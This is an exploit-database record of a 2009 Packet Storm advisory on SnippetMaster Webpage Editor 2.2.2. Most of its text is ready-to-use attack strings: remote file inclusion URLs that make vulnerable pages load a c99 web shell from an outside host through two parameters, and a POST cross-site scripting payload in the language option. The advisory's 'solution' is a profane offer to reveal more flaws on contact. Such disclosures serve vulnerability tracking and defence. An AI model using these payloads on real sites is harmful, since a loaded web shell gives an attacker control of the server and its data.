{"id": "PACKETSTORM:74775", "type": "packetstorm", "bulletinFamily": "exploit", "title": "SnippetMaster Webpage Editor RFI / XSS", "description": "", "published": "2009-02-09T00:00:00", "modified": "2009-02-09T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/74775/SnippetMaster-Webpage-Editor-RFI-XSS.html", "reporter": "RoMaNcYxHaCkEr", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:25:31", "viewCount": 1, "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2016-11-03T10:25:31", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:25:31", "rev": 2}, "vulnersScore": -0.0}, "sourceHref": "https://packetstormsecurity.com/files/download/74775/snippetmaster-rfixss.txt", "sourceData": "`# SnippetMaster Webpage Editor 2,2,2 Multiple Vulnes ( Remote File Include , Remote XSS ) \n \n# Free Download : http://www.snippetmaster.com/download/manual-install.php \n \n# Download Dezender Script : http://www.mediafire.com/?jv3gz1zwjxm \n \n- Found By : RoMaNcYxHaCkEr \n- My Site : WwW.Sec-Code.CoM \n- My Group : Security - Codes Group \n \n# Exploit [1]: \n \n- Remote File Include : \n \nhttp://www.sec-code.com/snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.sec-code.com/c99.txt? \n \nhttp://www.sec-code.com/snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.sec-code.com/c99.txt? \n \nhttp://www.sec-code.com/snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.sec-code.com/c99.txt? \n \n# Exploit [2]: \n \n- Remote XSS : \n \nhttp://www.sec-code.com/snippetmaster/index.php \n \nBy POST method In Option language Inject By This Code : \n \n<script>alert(413156995734)</script> \n \n# Solutions : \n \nContact With Me I Will Declear All This Fucking Functions \n \n# rXh \n \n# bEST wISHES \n \n`\n", "immutableFields": []}

{}